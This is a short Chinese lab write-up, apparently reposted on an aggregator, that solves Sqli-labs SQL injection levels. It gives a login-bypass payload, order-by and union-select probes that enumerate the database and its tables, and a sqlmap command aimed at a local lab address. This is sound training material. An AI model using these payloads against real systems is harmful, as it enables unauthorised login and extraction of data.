Sqli-labs - 走看看

zoukankan html css js c++ java

Sqli-labs
GET - Blind - Time based - Single Quotes

GET - Blind - Time based - Double Quotes

以上两题，可用sqlmap解答

POST - Error Based - Single quotes - String

POST表单注入，先用万能密码，尝试报错

如图，尝试在用户名的地方使用万能密码，最后总是在密码的地方报错

说明单引号闭合的地方是跟在密码后面

在用户名的地方随便输入，在密码处输入
```
' or 1=1#
```
使得判断条件为真，登陆成功

猜字段
```
' order by 2#
```
数据库名
```
' union select database(),2#
```
表名
```
' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
```
接下步骤不再赘述

当然sqlmap也能POST注入
```
sqlmap -u http://192.168.147.133/Less-11/ --form --batch --dbs
```
[Sign]做不出ctf题的时候很痛苦，你只能眼睁睁看着其他人领先你
查看全文

相关阅读:
使用反射调用某个类的成员方法
 java反射机制
 SVProgressHUD
__objc__
loadView
v2ex 下拉刷新 SCRootViewController
stuck with
v2ex 下拉刷新模块
 转载
 vue-cli脚手架构建了项目如何去除Eslint验证（语法格式验证）

原文地址：https://www.cnblogs.com/echoDetected/p/12856086.html

Copyright © 2011-2022 走看看